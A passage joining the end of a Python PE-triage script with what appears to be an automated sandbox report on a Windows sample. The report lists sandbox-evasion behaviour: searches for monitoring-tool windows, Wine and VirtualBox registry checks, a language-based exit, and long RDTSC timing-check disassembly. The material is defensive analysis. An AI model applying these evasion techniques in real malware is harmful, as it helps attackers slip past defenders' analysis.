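    struct.pack_into("<I", dos, 0x3C, len(dos))           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    for fmt, off, val in (("<H", 0, 0x10B), ("<I", 16, entry_rva), ("<I", 28, 0x400000),
                          ("<I", 32, sect_align), ("<I", 36, file_align),
                          ("<I", 56, sect_align * (len(sections) + 1)),
                          ("<I", 60, file_align), ("<I", 64, stored_checksum),
                          ("<H", 68, 2), ("<I", 92, 16)):
        struct.pack_into(fmt, opt, off, val)
    image, body, raw_ptr = dos + b"PE\0\0" + coff + opt, b"", file_align
    for i, (name, data) in enumerate(sections):
        image += struct.pack("<8sIIIIIIHHI", name, len(data), sect_align * (i + 1),
                             len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    return bytes(image.ljust(file_align, b"\0")) + body

if __name__ == "__main__":
    for line in triage(build_sample_pe(stored_checksum=0x1C612D))["findings"]:
        print(line)
```

To run the same checks on a real file, replace build_sample_pe with the bytes read from disk; the CheckSum comparison is the one the report phrases as "real checksum ... should be", and a mismatch is a cheap first hint that the file was patched or packed after the linker wrote it (many legitimate binaries carry a zero CheckSum, so treat it as a weak signal on its own).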

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13414)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D521BC second address: D521C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D521C6 second address: D521CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D521CC second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FC221A94B2Fh 0x0000000e push dword ptr [ebp+122D04E9h] 0x00000014 jmp 00007FC221A94B2Bh 0x00000019 call dword ptr [ebp+122D2819h] 0x0000001f pushad 0x00000020 jmp 00007FC221A94B37h 0x00000025 xor eax, eax 0x00000027 jmp 00007FC221A94B34h 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 stc 0x00000031 sub dword ptr [ebp+122D2F78h], edi 0x00000037 mov dword ptr [ebp+122D2B56h], eax 0x0000003d jmp 00007FC221A94B2Eh 0x00000042 mov esi, 0000003Ch 0x00000047 mov dword ptr [ebp+122D19E9h], edi 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 jno 00007FC221A94B2Ch 0x00000057 lodsw 0x00000059 pushad 0x0000005a jnl 00007FC221A94B2Ch 0x00000060 mov ecx, dword ptr [ebp+122D2B16h] 0x00000066 popad 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D1B69h], edx 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 clc 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jnp 00007FC221A94B3Eh 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC2295 second address: EC229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC229B second address: EC22A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC221A94B26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC22A8 second address: EC22AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC22AE second address: EC22B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EAFA4D second address: EAFA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EAFA51 second address: EAFA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EAFA5B second address: EAFA87 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f jo 00007FC220745E0Dh 0x00000015 jne 00007FC220745DF6h 0x0000001b jmp 00007FC220745E01h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EAFA87 second address: EAFAA1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B34h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EAFAA1 second address: EAFAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC198B second address: EC198F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC1C25 second address: EC1C4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC5635 second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007FC221A94B40h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jnp 00007FC221A94B3Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jg 00007FC221A94B47h 0x00000022 pop eax 0x00000023 stc 0x00000024 push dword ptr [ebp+122D04E9h] 0x0000002a jmp 00007FC221A94B37h 0x0000002f call dword ptr [ebp+122D2819h] 0x00000035 pushad 0x00000036 jmp 00007FC221A94B37h 0x0000003b xor eax, eax 0x0000003d jmp 00007FC221A94B34h 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 stc 0x00000047 sub dword ptr [ebp+122D2F78h], edi 0x0000004d mov dword ptr [ebp+122D2B56h], eax 0x00000053 jmp 00007FC221A94B2Eh 0x00000058 mov esi, 0000003Ch 0x0000005d mov dword ptr [ebp+122D19E9h], edi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 jno 00007FC221A94B2Ch 0x0000006d lodsw 0x0000006f pushad 0x00000070 jnl 00007FC221A94B2Ch 0x00000076 mov ecx, dword ptr [ebp+122D2B16h] 0x0000007c popad 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D1B69h], edx 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b clc 0x0000008c nop 0x0000008d push eax 0x0000008e push edx 0x0000008f jnp 00007FC221A94B3Eh 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC57C9 second address: EC57E3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC220745DFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC57E3 second address: EC5810 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC221A94B37h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5810 second address: EC584A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC220745DFCh 0x00000008 jnc 00007FC220745DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 sbb dx, 9FCDh 0x00000016 lea ebx, dword ptr [ebp+12447547h] 0x0000001c mov ecx, dword ptr [ebp+122D2BB2h] 0x00000022 sub ecx, dword ptr [ebp+122D1FF1h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC220745DFFh 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC584A second address: EC5854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC221A94B26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC58A7 second address: EC58D8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC220745DF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb edi, 62603C2Ch 0x00000013 jne 00007FC220745DFCh 0x00000019 push 00000000h 0x0000001b movsx ecx, cx 0x0000001e push A55982BEh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC58D8 second address: EC58DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC58DC second address: EC58F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A12 second address: EC5A1F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A1F second address: EC5A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B74 second address: EC5B83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B83 second address: EC5B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FC220745DF8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B97 second address: EC5BD4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC221A94B28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d add ecx, dword ptr [ebp+122D2525h] 0x00000013 lea ebx, dword ptr [ebp+1244755Bh] 0x00000019 jbe 00007FC221A94B2Ch 0x0000001f mov dword ptr [ebp+122D1B75h], edx 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push esi 0x00000028 jmp 00007FC221A94B30h 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2E13 second address: EB2E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFAh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FC220745DFCh 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2E34 second address: EB2E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 je 00007FC221A94B26h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FC221A94B2Ah 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2E55 second address: EB2E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3445 second address: EE346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC221A94B36h 0x0000000c js 00007FC221A94B34h 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE35BD second address: EE35D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007FC220745DFBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3728 second address: EE3751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FC221A94B2Eh 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3751 second address: EE3755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3755 second address: EE3780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FC221A94B26h 0x00000010 jmp 00007FC221A94B30h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3780 second address: EE37A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC220745E09h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3901 second address: EE390C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE390C second address: EE3912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3912 second address: EE3916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3916 second address: EE3933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A90 second address: EE3AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC221A94B32h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3AA9 second address: EE3AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3AB1 second address: EE3AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3AB7 second address: EE3ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC220745E06h 0x0000000f jns 00007FC220745DF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3C36 second address: EE3C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC221A94B34h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3DA9 second address: EE3DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED8A09 second address: ED8A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB487A second address: EB487E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4FD1 second address: EE4FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B36h 0x00000009 jno 00007FC221A94B26h 0x0000000f popad 0x00000010 push ecx 0x00000011 jno 00007FC221A94B26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE52D9 second address: EE52DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE52DD second address: EE52E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCF93 second address: EBCF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCF97 second address: EBCFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FC221A94B32h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCFA5 second address: EBCFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCFAB second address: EBCFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCFAF second address: EBCFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9778 second address: EE9787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC221A94B26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9787 second address: EE978B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE978B second address: EE97C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC221A94B32h 0x0000000e pop edx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jp 00007FC221A94B30h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE97C3 second address: EE97C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE97C7 second address: EE97D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE880F second address: EE8813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBA6 second address: EEBBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBAC second address: EEBBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBB0 second address: EEBBC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBC4 second address: EEBBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745E04h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE30 second address: EADE47 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC221A94B26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007FC221A94B26h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE47 second address: EADE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE4C second address: EADE6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC221A94B2Fh 0x00000008 jbe 00007FC221A94B26h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE6D second address: EADE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF806 second address: EEF811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC221A94B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF811 second address: EEF817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7D99 second address: EB7DAE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC221A94B26h 0x00000008 jmp 00007FC221A94B2Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7DAE second address: EB7DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC220745DFCh 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FC220745DFEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2466 second address: EF247F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FC221A94B26h 0x0000000d jmp 00007FC221A94B2Bh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF247F second address: EF2485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2485 second address: EF24C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e ja 00007FC221A94B2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FC221A94B26h 0x0000001c jmp 00007FC221A94B37h 0x00000021 rdtsc
